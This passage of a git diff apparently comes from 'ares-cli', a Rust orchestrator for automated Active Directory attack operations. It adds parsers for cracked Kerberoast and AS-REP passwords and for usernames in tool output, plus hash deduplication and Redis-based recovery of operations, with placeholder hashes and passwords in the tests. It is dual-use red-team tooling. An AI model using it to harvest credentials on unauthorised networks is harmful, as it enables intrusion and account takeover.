+#[test] +fn test_extract_cracked_dedup() { + let output = "\ +$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc:Summer2024!\n\ +$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$def:Summer2024!"; + let creds = extract_cracked_passwords(output, "contoso.local"); + assert_eq!(creds.len(), 1, "Should dedup same user@domain"); +} + +#[test] +fn test_extract_cracked_no_false_positives_on_uncracked() { + // Uncracked TGS hash should NOT produce a cracked credential + let output = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc123def456"; + let creds = extract_cracked_passwords(output, "contoso.local"); + assert!( + creds.is_empty(), + "Uncracked hash should not produce credential" + ); +} + +#[test] +fn test_extract_cracked_john_not_triggered_without_context() { + // john --show format should only match if "password hash cracked" context is present + let output = "svc_sql:Summer2024!::::::::"; + let creds = extract_cracked_passwords(output, "contoso.local"); + assert!( + creds.is_empty(), + "John format without context should not match" + ); +} + +#[test] +fn test_extract_cracked_asrep_john_show_no_hex() { + // John --show for AS-REP omits the hex hash section + let output = "--- john --show ---\n\ + $krb5asrep$23$brian.davis@CHILD.CONTOSO.LOCAL:letmein2025\n\n\ + 1 password hash cracked, 0 left\n"; + let creds = extract_cracked_passwords(output, "child.contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "brian.davis"); + assert_eq!(creds[0].password, "letmein2025"); + assert_eq!(creds[0].domain, "CHILD.CONTOSO.LOCAL"); +} + +#[test] +fn test_extract_cracked_tgs_john_show_unknown_user() { + // John --show for TGS shows ?:password — extract user from TGS hash in same output + let output = "Loaded 1 password hash (krb5tgs)\n\ + $krb5tgs$23$*john.smith$CHILD.CONTOSO.LOCAL$CIFS/filesvr01*$abcdef$123456\n\ + --- john --show ---\n\ + ?:iknownothing\n\n\ + 1 password hash cracked, 0 left\n"; + let creds = extract_cracked_passwords(output, "child.contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "john.smith"); + assert_eq!(creds[0].password, "iknownothing"); + assert_eq!(creds[0].domain, "CHILD.CONTOSO.LOCAL"); + assert_eq!(creds[0].source, "cracked:john"); +} + +#[test] +fn test_extract_cracked_tgs_john_unknown_user_no_hash_context() { + // Without a TGS hash line in the output, ?:password is skipped + let output = "--- john --show ---\n\ + ?:iknownothing\n\n\ + 1 password hash cracked, 0 left\n"; + let creds = extract_cracked_passwords(output, "contoso.local"); + assert!(creds.is_empty(), "No TGS hash context = no credential"); +} + +#[test] +fn test_extract_cracked_no_false_positive_on_raw_asrep_hash() { + // Raw GetNPUsers AS-REP hash should NOT produce a cracked credential. + // The hash body is long hex+$ which is_valid_credential must reject. 
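+    // (is_valid_credential in mod.rs rejects candidate passwords longer than
+    // 40 chars composed purely of hex digits and '$'.)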
+ let output = "$krb5asrep$23$brian.davis@CHILD.CONTOSO.LOCAL:7dae198e2c2fd940e1cbb59d7817c755$ef0c20c7d3abaaf411eb7c9bfe28c6aeae8410170fd08daf198b9269344aa64b9ad78f3f5b807dee0e8573e3bdec9fd90d0b46fa56baba08708f716d9b43a9f9bb2481ab56453d7a340f60ac478f6114f4fb0db7a424fd075f4cef9061954bf53ac6ac6dc3b0cc153b1bc909cac6cdcad9337022bf24ad2069d1991e9ca6eced54eb31f0016f3d9a2983c7f95c7f92261a8a1c435300576a98943a34046f4c08ecc4c6e81d9ca7aa3ae9a4baeb0e4071cd27c82203a225e741f4867afd15405552a47145ec3d79f1d5d19a90109b24ea593c26169fbccc54816f288a30c08ff34dc11bc105366685769b3edf9027be1dbad2f770edfa3ccd3f9524e93de40033464f07cdefb0"; + let creds = extract_cracked_passwords(output, "child.contoso.local"); + assert!( + creds.is_empty(), + "Raw AS-REP hash body should not be treated as cracked password" + ); +} + +#[test] +fn test_valid_credential_rejects_hash_body_password() { + // Long hex+$ strings should be rejected as hash fragments + assert!(!is_valid_credential( + "brian.davis", + "7dae198e2c2fd940e1cbb59d7817c755$ef0c20c7d3abaaf411eb7c9bfe28c6aeae" + )); + // Short real passwords should still pass + assert!(is_valid_credential("brian.davis", "letmein2025")); +} diff --git a/ares-cli/src/orchestrator/output_extraction/users.rs b/ares-cli/src/orchestrator/output_extraction/users.rs new file mode 100644 index 00000000..27dfd2f6 --- /dev/null +++ b/ares-cli/src/orchestrator/output_extraction/users.rs @@ -0,0 +1,148 @@ +use regex::Regex; +use std::sync::LazyLock; + +use ares_core::models::User; + +static RE_DOMAIN_CONTEXT: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)\(domain:([^)]+)\)").unwrap()); + +pub(crate) static RE_DOMAIN_BACKSLASH: LazyLock = + LazyLock::new(|| Regex::new(r"([A-Za-z0-9_.\-]+)\\([A-Za-z0-9_.\-$]+)").unwrap()); + +pub(crate) static RE_UPN: LazyLock = LazyLock::new(|| { + Regex::new(r"([A-Za-z0-9_.\-]+)@([A-Za-z0-9_.\-]+\.[A-Za-z0-9_.\-]+)").unwrap() +}); + +pub(crate) static RE_USER_BRACKET: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)user:\[([^\]]+)\]").unwrap()); + +pub(crate) static RE_ACCOUNT: LazyLock = + LazyLock::new(|| Regex::new(r"Account:\s*([A-Za-z0-9_.\-]+)").unwrap()); + +static RE_SAM: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)samaccountname:\s*([A-Za-z0-9_.\-]+)").unwrap()); + +static RE_SMB_TIMESTAMP: LazyLock = LazyLock::new(|| { + Regex::new(r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+\d{4}-\d{2}-\d{2}").unwrap() +}); + +/// Reject garbage usernames and invalid domains from regex extraction. 
+pub fn is_valid_extracted_user(username: &str, domain: &str) -> bool {
+    if username.is_empty() || username.ends_with('$') {
+        return false;
+    }
+    if username.bytes().any(|b| b < 0x20) || domain.bytes().any(|b| b < 0x20) {
+        return false;
+    }
+    if username.len() <= 1 {
+        return false;
+    }
+    let lower = username.to_lowercase();
+    const NOISE: &[&str] = &[
+        "anonymous",
+        "none",
+        "null",
+        "unknown",
+        "n/a",
+        "default",
+        "test",
+        "local",
+        "localhost",
+        "domain",
+        "workgroup",
+    ];
+    if NOISE.contains(&lower.as_str()) {
+        return false;
+    }
+    if username.starts_with('_') || domain.starts_with('_') {
+        return false;
+    }
+    if !domain.contains('.') {
+        if domain.len() > 15 || domain.is_empty() {
+            return false;
+        }
+        if !domain
+            .bytes()
+            .all(|b| b.is_ascii_alphanumeric() || b == b'-')
+        {
+            return false;
+        }
+    }
+    if !username.bytes().all(|b| b.is_ascii_graphic()) {
+        return false;
+    }
+    true
+}
+
+pub fn extract_users(output: &str, default_domain: &str) -> Vec<User> {
+    let mut users = Vec::new();
+    let mut seen = std::collections::HashSet::new();
+    let mut current_domain = default_domain.to_string();
+
+    for line in output.lines() {
+        let stripped = line.trim();
+
+        if let Some(caps) = RE_DOMAIN_CONTEXT.captures(stripped) {
+            current_domain = caps
+                .get(1)
+                .unwrap()
+                .as_str()
+                .trim_end_matches('.')
+                .to_string();
+        }
+
+        let mut found = Vec::new();
+
+        if let Some(caps) = RE_DOMAIN_BACKSLASH.captures(stripped) {
+            let dom = caps.get(1).unwrap().as_str();
+            let user = caps.get(2).unwrap().as_str();
+            found.push((user.to_string(), dom.to_string()));
+        }
+
+        if let Some(caps) = RE_UPN.captures(stripped) {
+            let user = caps.get(1).unwrap().as_str();
+            let dom = caps.get(2).unwrap().as_str();
+            found.push((user.to_string(), dom.to_string()));
+        }
+
+        for caps in RE_USER_BRACKET.captures_iter(stripped) {
+            let user = caps.get(1).unwrap().as_str();
+            found.push((user.to_string(), current_domain.clone()));
+        }
+
+        if let Some(caps) = RE_ACCOUNT.captures(stripped) {
+            let user = caps.get(1).unwrap().as_str();
+            found.push((user.to_string(), current_domain.clone()));
+        }
+
+        if let Some(caps) = RE_SAM.captures(stripped) {
+            let user = caps.get(1).unwrap().as_str();
+            found.push((user.to_string(), current_domain.clone()));
+        }
+
+        if let Some(caps) = RE_SMB_TIMESTAMP.captures(stripped) {
+            let user = caps.get(1).unwrap().as_str();
+            found.push((user.to_string(), current_domain.clone()));
+        }
+
+        for (raw_username, raw_domain) in found {
+            let username = raw_username.trim().trim_end_matches('.').to_string();
+            let domain = raw_domain.trim().trim_end_matches('.').to_string();
+            if !is_valid_extracted_user(&username, &domain) {
+                continue;
+            }
+            let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase());
+            if seen.insert(key) {
+                users.push(User {
+                    username,
+                    domain,
+                    description: String::new(),
+                    is_admin: false,
+                    source: "output_extraction".to_string(),
+                });
+            }
+        }
+    }
+
+    users
+}
diff --git a/ares-cli/src/orchestrator/recovery/dedup.rs b/ares-cli/src/orchestrator/recovery/dedup.rs
new file mode 100644
index 00000000..22da9a39
--- /dev/null
+++ b/ares-cli/src/orchestrator/recovery/dedup.rs
@@ -0,0 +1,273 @@
+//! Hash deduplication logic.
+
+use std::collections::HashSet;
+
+use tracing::info;
+
+use ares_core::models::Hash;
+
+/// Deduplicate hashes, keeping first occurrence.
+///
+/// - **AS-REP hashes**: dedup by `(domain.lower(), username.lower())` since
+///   each AS-REP request generates a different hash but cracks to the same
+///   password.
+/// - **Kerberoast/TGS hashes**: dedup by `(domain.lower(), username.lower(),
+///   spn_key)` where spn_key is extracted from the hash format.
+/// - **NTLM/other hashes**: dedup by exact `hash_value`.
+pub fn dedupe_hashes(hashes: Vec<Hash>) -> Vec<Hash> {
+    let mut seen_asrep: HashSet<(String, String)> = HashSet::new();
+    let mut seen_kerberoast: HashSet<(String, String, String)> = HashSet::new();
+    let mut seen_other: HashSet<String> = HashSet::new();
+    let mut result = Vec::with_capacity(hashes.len());
+    let original_len = hashes.len();
+
+    for h in hashes {
+        let hash_type = h.hash_type.trim().to_lowercase();
+        let hash_value = &h.hash_value;
+        let username = h.username.trim().to_lowercase();
+        let domain = h.domain.trim().to_lowercase();
+
+        let is_asrep = matches!(hash_type.as_str(), "as-rep" | "asrep" | "krb5asrep")
+            || hash_value.starts_with("$krb5asrep$");
+
+        let is_kerberoast = matches!(
+            hash_type.as_str(),
+            "kerberoast" | "krb5tgs" | "tgs-rep" | "tgs"
+        ) || hash_value.starts_with("$krb5tgs$");
+
+        if is_asrep {
+            let key = (domain, username);
+            if seen_asrep.contains(&key) {
+                continue;
+            }
+            seen_asrep.insert(key);
+        } else if is_kerberoast {
+            let spn_key = extract_kerberoast_spn_key(hash_value).unwrap_or_default();
+            let key = (domain, username, spn_key);
+            if seen_kerberoast.contains(&key) {
+                continue;
+            }
+            seen_kerberoast.insert(key);
+        } else {
+            if seen_other.contains(hash_value) {
+                continue;
+            }
+            seen_other.insert(hash_value.clone());
+        }
+
+        result.push(h);
+    }
+
+    let removed = original_len - result.len();
+    if removed > 0 {
+        info!(removed = removed, "Deduplicated hashes");
+    }
+    result
+}
+
+/// Extract SPN and encryption type from a Kerberoast hash for deduplication.
+///
+/// Hash format: `$krb5tgs$ETYPE$*user$realm$spn*$checksum$encrypted`
+pub(crate) fn extract_kerberoast_spn_key(hash_value: &str) -> Option<String> {
+    if !hash_value.starts_with("$krb5tgs$") {
+        return None;
+    }
+    let dollar_parts: Vec<&str> = hash_value.split('$').collect();
+    if dollar_parts.len() < 4 {
+        return None;
+    }
+    let etype = dollar_parts[2];
+    let asterisk_parts: Vec<&str> = hash_value.split('*').collect();
+    if asterisk_parts.len() < 2 {
+        return None;
+    }
+    let inner_parts: Vec<&str> = asterisk_parts[1].split('$').collect();
+    if inner_parts.len() < 3 {
+        return None;
+    }
+    let spn = inner_parts[2];
+    Some(format!("{etype}:{spn}"))
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn make_hash(username: &str, domain: &str, hash_type: &str, hash_value: &str) -> Hash {
+        Hash {
+            id: String::new(),
+            username: username.to_string(),
+            hash_value: hash_value.to_string(),
+            hash_type: hash_type.to_string(),
+            domain: domain.to_string(),
+            cracked_password: None,
+            source: String::new(),
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+            aes_key: None,
+        }
+    }
+
+    // --- extract_kerberoast_spn_key ---
+
+    #[test]
+    fn test_extract_spn_key_valid() {
+        let hash = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$aabb$ccdd";
+        let key = extract_kerberoast_spn_key(hash);
+        assert!(key.is_some());
+        let key = key.unwrap();
+        assert!(key.starts_with("23:"));
+        assert!(key.contains("MSSQLSvc"));
+    }
+
+    #[test]
+    fn test_extract_spn_key_not_krb5tgs() {
+        assert_eq!(extract_kerberoast_spn_key("$krb5asrep$23$user"), None);
+    }
+
+    #[test]
+    fn test_extract_spn_key_too_short() {
+        assert_eq!(extract_kerberoast_spn_key("$krb5tgs$"), None);
+    }
+
+    // --- dedupe_hashes ---
+
+    #[test]
+    fn test_dedupe_ntlm_by_hash_value() {
+        let hashes = vec![
+            make_hash(
+                "admin",
+                "contoso.local",
+
"ntlm", + "aabbccdd11223344aabbccdd11223344", + ), + make_hash( + "admin", + "contoso.local", + "ntlm", + "aabbccdd11223344aabbccdd11223344", + ), // dup + make_hash( + "admin", + "contoso.local", + "ntlm", + "eeff0011eeff0011eeff0011eeff0011", + ), + ]; + let deduped = dedupe_hashes(hashes); + assert_eq!(deduped.len(), 2); + } + + #[test] + fn test_dedupe_asrep_by_domain_user() { + let hashes = vec![ + make_hash( + "svc_web", + "contoso.local", + "as-rep", + "$krb5asrep$23$svc_web@CONTOSO.LOCAL:aabb", + ), + make_hash( + "svc_web", + "contoso.local", + "asrep", + "$krb5asrep$23$svc_web@CONTOSO.LOCAL:ccdd", + ), + ]; + let deduped = dedupe_hashes(hashes); + assert_eq!(deduped.len(), 1); // same user+domain → deduped + } + + #[test] + fn test_dedupe_asrep_different_users() { + let hashes = vec![ + make_hash( + "svc_web", + "contoso.local", + "as-rep", + "$krb5asrep$23$svc_web:aabb", + ), + make_hash( + "svc_sql", + "contoso.local", + "as-rep", + "$krb5asrep$23$svc_sql:ccdd", + ), + ]; + let deduped = dedupe_hashes(hashes); + assert_eq!(deduped.len(), 2); // different users → kept + } + + #[test] + fn test_dedupe_kerberoast_by_spn() { + let hashes = vec![ + make_hash( + "svc_sql", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$aabb$cc", + ), + make_hash( + "svc_sql", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$ddee$ff", + ), + ]; + let deduped = dedupe_hashes(hashes); + assert_eq!(deduped.len(), 1); // same SPN → deduped + } + + #[test] + fn test_dedupe_mixed_types() { + let hashes = vec![ + make_hash( + "admin", + "contoso.local", + "ntlm", + "aabbccdd11223344aabbccdd11223344", + ), + make_hash( + "svc_web", + "contoso.local", + "as-rep", + "$krb5asrep$23$svc_web:aabb", + ), + make_hash( + "svc_sql", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc*$aa$bb", + ), + ]; + let deduped = dedupe_hashes(hashes); + assert_eq!(deduped.len(), 3); // all unique + } + + #[test] + fn test_dedupe_empty() { + let deduped = dedupe_hashes(vec![]); + assert!(deduped.is_empty()); + } + + #[test] + fn test_dedupe_case_insensitive() { + let hashes = vec![ + make_hash( + "Admin", + "CONTOSO.LOCAL", + "as-rep", + "$krb5asrep$23$Admin:aabb", + ), + make_hash( + "admin", + "contoso.local", + "as-rep", + "$krb5asrep$23$admin:ccdd", + ), + ]; + let deduped = dedupe_hashes(hashes); + assert_eq!(deduped.len(), 1); + } +} diff --git a/ares-cli/src/orchestrator/recovery/manager.rs b/ares-cli/src/orchestrator/recovery/manager.rs new file mode 100644 index 00000000..d0b4aae5 --- /dev/null +++ b/ares-cli/src/orchestrator/recovery/manager.rs @@ -0,0 +1,256 @@ +//! OperationRecoveryManager -- recovery of operation state from Redis. + +use std::collections::HashMap; + +use anyhow::{Context, Result}; +use redis::AsyncCommands; +use tracing::{error, info, warn}; + +use ares_core::models::{TaskInfo, TaskStatus}; +use ares_core::state::{self, RedisStateReader}; + +use crate::orchestrator::task_queue::TaskQueue; + +use super::dedup::dedupe_hashes; +use super::normalize::{normalize_credential_domains, normalize_hash_domains}; +use super::requeue::requeue_task; +use super::types::{ + is_connection_error, RecoveredState, INTERRUPTED_STATUSES, MAX_CONNECTION_RETRIES, MAX_RETRIES, +}; + +/// Manages recovery of operation state from Redis after a restart. +pub struct OperationRecoveryManager { + redis_url: String, +} + +impl OperationRecoveryManager { + /// Create a new recovery manager. 
+    pub fn new(redis_url: String) -> Self {
+        Self { redis_url }
+    }
+
+    /// Attempt to recover an operation's state from Redis.
+    ///
+    /// 1. Checks that `ares:op:{operation_id}:meta` exists
+    /// 2. Loads full state via `RedisStateReader`
+    /// 3. Deduplicates hashes
+    /// 4. Normalizes credential/hash domains against netbios_to_fqdn map
+    /// 5. Loads pending tasks from `ares:op:{id}:pending_tasks` HASH
+    /// 6. Re-enqueues interrupted tasks (incrementing retry count)
+    /// 7. Returns recovered state + lists of requeued/failed task IDs
+    ///
+    /// Retries up to `MAX_CONNECTION_RETRIES` times on transient Redis errors.
+    pub async fn recover(&self, operation_id: &str) -> Result<RecoveredState> {
+        let mut last_err: Option<anyhow::Error> = None;
+
+        for attempt in 1..=MAX_CONNECTION_RETRIES {
+            let queue = match TaskQueue::connect(&self.redis_url).await {
+                Ok(q) => q,
+                Err(e) => {
+                    if attempt < MAX_CONNECTION_RETRIES {
+                        warn!(
+                            attempt = attempt,
+                            err = %e,
+                            "Redis connection failed, retrying"
+                        );
+                        last_err = Some(e);
+                        continue;
+                    }
+                    return Err(e).context("Failed to connect to Redis for recovery");
+                }
+            };
+
+            match Self::recover_inner(&queue, operation_id).await {
+                Ok(result) => return Ok(result),
+                Err(e) => {
+                    if is_connection_error(&e) && attempt < MAX_CONNECTION_RETRIES {
+                        warn!(
+                            attempt = attempt,
+                            err = %e,
+                            "Transient Redis error during recovery, retrying"
+                        );
+                        last_err = Some(e);
+                        continue;
+                    }
+                    return Err(e);
+                }
+            }
+        }
+
+        Err(last_err
+            .unwrap_or_else(|| anyhow::anyhow!("Recovery retry exhausted"))
+            .context("Recovery failed after retries"))
+    }
+
+    /// Inner recovery logic (called within retry wrapper).
+    async fn recover_inner(queue: &TaskQueue, operation_id: &str) -> Result<RecoveredState> {
+        let mut conn = queue.connection();
+        let reader = RedisStateReader::new(operation_id.to_string());
+
+        let exists = reader
+            .exists(&mut conn)
+            .await
+            .context("Failed to check operation existence")?;
+        if !exists {
+            anyhow::bail!(
+                "Operation {} not found in Redis -- cannot recover",
+                operation_id
+            );
+        }
+
+        let mut loaded_state = reader
+            .load_state(&mut conn)
+            .await
+            .context("Failed to load state from Redis")?
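+            // Ok(None) here means the meta key exists but no state payload
+            // was stored; treat that as an unrecoverable operation below.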
+            .ok_or_else(|| anyhow::anyhow!("Operation {} has no state data", operation_id))?;
+
+        info!(
+            operation_id = operation_id,
+            credentials = loaded_state.all_credentials.len(),
+            hashes = loaded_state.all_hashes.len(),
+            hosts = loaded_state.all_hosts.len(),
+            has_domain_admin = loaded_state.has_domain_admin,
+            "State loaded for recovery"
+        );
+
+        let original_hash_count = loaded_state.all_hashes.len();
+        loaded_state.all_hashes = dedupe_hashes(loaded_state.all_hashes);
+        let deduped = original_hash_count - loaded_state.all_hashes.len();
+        if deduped > 0 {
+            info!(removed = deduped, "Deduplicated hashes during recovery");
+        }
+
+        let cred_fixed = normalize_credential_domains(
+            &mut loaded_state.all_credentials,
+            &loaded_state.netbios_to_fqdn,
+        );
+        let hash_fixed =
+            normalize_hash_domains(&mut loaded_state.all_hashes, &loaded_state.netbios_to_fqdn);
+
+        if cred_fixed > 0 || hash_fixed > 0 {
+            info!(
+                cred_fixed = cred_fixed,
+                hash_fixed = hash_fixed,
+                "Normalized domains during recovery"
+            );
+
+            if cred_fixed > 0 {
+                for cred in &loaded_state.all_credentials {
+                    let _ = reader.add_credential(&mut conn, cred).await;
+                }
+            }
+            if hash_fixed > 0 {
+                for h in &loaded_state.all_hashes {
+                    let _ = reader.add_hash(&mut conn, h).await;
+                }
+            }
+        }
+
+        let pending_tasks_key = state::build_key(operation_id, state::KEY_PENDING_TASKS);
+        let raw_tasks: HashMap<String, String> =
+            conn.hgetall(&pending_tasks_key).await.unwrap_or_default();
+
+        let mut pending_tasks: HashMap<String, TaskInfo> = HashMap::new();
+        for (task_id, json_str) in &raw_tasks {
+            match serde_json::from_str::<TaskInfo>(json_str) {
+                Ok(task_info) => {
+                    pending_tasks.insert(task_id.clone(), task_info);
+                }
+                Err(e) => {
+                    warn!(
+                        task_id = %task_id,
+                        err = %e,
+                        "Failed to deserialize pending task, skipping"
+                    );
+                }
+            }
+        }
+
+        info!(
+            operation_id = operation_id,
+            pending_tasks = pending_tasks.len(),
+            "Loaded pending tasks for recovery"
+        );
+
+        let mut requeued_task_ids = Vec::new();
+        let mut failed_task_ids = Vec::new();
+
+        for (task_id, task) in &mut pending_tasks {
+            if !INTERRUPTED_STATUSES.contains(&task.status) {
+                continue;
+            }
+
+            // Increment retry count for tasks that were actively running
+            if task.status == TaskStatus::InProgress {
+                task.retry_count += 1;
+            }
+
+            let max_retries = task.max_retries.max(MAX_RETRIES);
+
+            if task.retry_count <= max_retries {
+                task.status = TaskStatus::Retrying;
+                if task.retry_count > 0 {
+                    task.error = Some(format!(
+                        "Pod restart during execution (retry {}/{})",
+                        task.retry_count, max_retries
+                    ));
+                } else {
+                    task.error = Some("Requeued after pod restart (task was pending)".to_string());
+                }
+
+                match requeue_task(queue, task_id, task).await {
+                    Ok(()) => {
+                        requeued_task_ids.push(task_id.clone());
+                        info!(
+                            task_id = %task_id,
+                            retry_count = task.retry_count,
+                            max_retries = max_retries,
+                            "Task requeued for recovery"
+                        );
+                    }
+                    Err(e) => {
+                        warn!(
+                            task_id = %task_id,
+                            err = %e,
+                            "Failed to requeue task"
+                        );
+                    }
+                }
+            } else {
+                // Exceeded max retries
+                task.status = TaskStatus::Failed;
+                task.error = Some(format!(
+                    "Pod restart during execution (max retries {} exceeded)",
+                    max_retries
+                ));
+                task.completed_at = Some(chrono::Utc::now());
+                failed_task_ids.push(task_id.clone());
+                error!(
+                    task_id = %task_id,
+                    retry_count = task.retry_count,
+                    "Task permanently failed after max retries"
+                );
+            }
+        }
+
+        // Persist updated pending_tasks back to Redis
+        for (task_id, task) in &pending_tasks {
+            if let Ok(json) = serde_json::to_string(task) {
+                let _: Result<(), _> =
conn.hset(&pending_tasks_key, task_id, &json).await; + } + } + + info!( + operation_id = operation_id, + requeued = requeued_task_ids.len(), + failed = failed_task_ids.len(), + "Recovery complete" + ); + + Ok(RecoveredState { + state: loaded_state, + requeued_task_ids, + failed_task_ids, + }) + } +} diff --git a/ares-cli/src/orchestrator/recovery/mod.rs b/ares-cli/src/orchestrator/recovery/mod.rs new file mode 100644 index 00000000..f9ea6fd5 --- /dev/null +++ b/ares-cli/src/orchestrator/recovery/mod.rs @@ -0,0 +1,440 @@ +//! Operation recovery manager. +//! +//! On startup, the orchestrator can recover state from a previous run by +//! loading it from Redis and re-enqueueing any interrupted tasks (those with +//! status PENDING, IN_PROGRESS, or RETRYING). +//! +//! Ported from `ares.core.recovery` (Python). Key additions over the initial +//! skeleton: +//! +//! - **Hash deduplication** (`dedupe_hashes`) -- AS-REP by (domain,username), +//! Kerberoast by (domain,username,spn_key), NTLM by exact hash value. +//! - **Pending-task requeuing** -- loads `ares:op:{id}:pending_tasks` HASH +//! instead of scanning global `ares:task_status:*` keys. +//! - **State normalization** -- fixes NetBIOS -> FQDN domain mismatches on +//! credentials and hashes, persists corrections back to Redis. +//! - **Connection error detection** with retry logic. +//! - **`OperationResumeHelper`** -- analysis methods for post-recovery summary. + +mod dedup; +mod manager; +mod normalize; +mod requeue; +mod resume_helper; +mod types; + +// Re-export all public items at the same paths they had before the split. +// Allow unused -- these re-exports document the module API and are needed by +// tests and by main.rs (OperationRecoveryManager). The remaining types are +// returned from public methods and would be needed by any future library consumer. +pub use manager::OperationRecoveryManager; +#[allow(unused_imports)] +pub use resume_helper::OperationResumeHelper; +#[allow(unused_imports)] +pub use types::{InterruptedTask, RecoveredState, RetryingTask}; + +// Items that were module-private in the original single file; re-exported +// here only for intra-crate use and tests. 
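+// (manager.rs, for instance, runs dedupe_hashes over the loaded state and the
+// normalize_* helpers against its netbios_to_fqdn map during recovery.)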
+#[allow(unused_imports)] +pub(crate) use dedup::dedupe_hashes; +#[allow(unused_imports)] +pub(crate) use normalize::{normalize_credential_domains, normalize_hash_domains, resolve_domain}; + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +#[cfg(test)] +mod tests { + use std::collections::HashMap; + + use ares_core::models::{Credential, Hash, TaskInfo, TaskStatus}; + + use super::dedup::extract_kerberoast_spn_key; + use super::types::is_connection_error; + use super::*; + + fn make_hash(username: &str, domain: &str, hash_type: &str, hash_value: &str) -> Hash { + Hash { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + hash_value: hash_value.to_string(), + hash_type: hash_type.to_string(), + domain: domain.to_string(), + cracked_password: None, + source: String::new(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + } + } + + // --- Hash dedup tests --- + + #[test] + fn test_dedupe_asrep_by_domain_username() { + let hashes = vec![ + make_hash( + "edavis", + "contoso.local", + "asrep", + "$krb5asrep$23$edavis@CONTOSO.LOCAL$aaaa", + ), + make_hash( + "edavis", + "contoso.local", + "asrep", + "$krb5asrep$23$edavis@CONTOSO.LOCAL$bbbb", + ), + make_hash( + "edavis", + "contoso.local", + "asrep", + "$krb5asrep$23$edavis@CONTOSO.LOCAL$cccc", + ), + ]; + let result = dedupe_hashes(hashes); + assert_eq!( + result.len(), + 1, + "AS-REP hashes for same user should dedupe to 1" + ); + assert!( + result[0].hash_value.ends_with("$aaaa"), + "Should keep first occurrence" + ); + } + + #[test] + fn test_dedupe_asrep_different_users_kept() { + let hashes = vec![ + make_hash( + "edavis", + "contoso.local", + "as-rep", + "$krb5asrep$23$edavis@C$aaa", + ), + make_hash( + "fwilson", + "contoso.local", + "as-rep", + "$krb5asrep$23$fwilson@C$bbb", + ), + ]; + let result = dedupe_hashes(hashes); + assert_eq!(result.len(), 2, "Different users should be kept"); + } + + #[test] + fn test_dedupe_kerberoast_by_spn() { + let hashes = vec![ + make_hash( + "svc_sql", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$checksum1$enc1", + ), + make_hash( + "svc_sql", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$checksum2$enc2", + ), + ]; + let result = dedupe_hashes(hashes); + assert_eq!(result.len(), 1, "Same SPN kerberoast hashes should dedupe"); + } + + #[test] + fn test_dedupe_kerberoast_different_spn_kept() { + let hashes = vec![ + make_hash( + "svc_sql", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01*$chk$enc", + ), + make_hash( + "svc_sql", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db02*$chk$enc", + ), + ]; + let result = dedupe_hashes(hashes); + assert_eq!(result.len(), 2, "Different SPNs should be kept"); + } + + #[test] + fn test_dedupe_ntlm_by_exact_value() { + let hashes = vec![ + make_hash( + "admin", + "contoso.local", + "NTLM", + "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", // pragma: allowlist secret + ), + make_hash( + "admin", + "contoso.local", + "NTLM", + "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", // pragma: allowlist secret + ), + make_hash( + "admin", + "contoso.local", + "NTLM", + "aad3b435b51404eeaad3b435b51404ee:different_hash_value", // pragma: allowlist secret + ), + ]; + let result = 
dedupe_hashes(hashes); + assert_eq!( + result.len(), + 2, + "Identical NTLM hashes should dedupe, different kept" + ); + } + + #[test] + fn test_dedupe_mixed_types() { + let hashes = vec![ + // 2 AS-REP for same user -> 1 + make_hash( + "edavis", + "contoso.local", + "asrep", + "$krb5asrep$23$edavis@C$a", + ), + make_hash( + "edavis", + "contoso.local", + "asrep", + "$krb5asrep$23$edavis@C$b", + ), + // 1 NTLM + make_hash("admin", "contoso.local", "NTLM", "aad3b435:hash1"), // pragma: allowlist secret + // 1 Kerberoast + make_hash( + "svc", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc$CONTOSO.LOCAL$SPN*$chk$enc", + ), + ]; + let result = dedupe_hashes(hashes); + assert_eq!( + result.len(), + 3, + "Should keep 1 asrep + 1 ntlm + 1 kerberoast" + ); + } + + #[test] + fn test_dedupe_empty() { + let result = dedupe_hashes(vec![]); + assert!(result.is_empty()); + } + + #[test] + fn test_dedupe_case_insensitive() { + let hashes = vec![ + make_hash( + "EDavis", + "CONTOSO.LOCAL", + "asrep", + "$krb5asrep$23$EDavis@C$a", + ), + make_hash( + "edavis", + "contoso.local", + "asrep", + "$krb5asrep$23$edavis@C$b", + ), + ]; + let result = dedupe_hashes(hashes); + assert_eq!(result.len(), 1, "Case-insensitive dedup for AS-REP"); + } + + // --- Retry limit tests --- + + #[test] + fn test_retry_limit_not_exceeded() { + let task = TaskInfo { + task_id: "test_1".to_string(), + task_type: "recon".to_string(), + assigned_agent: "recon".to_string(), + status: TaskStatus::InProgress, + created_at: chrono::Utc::now(), + started_at: None, + completed_at: None, + 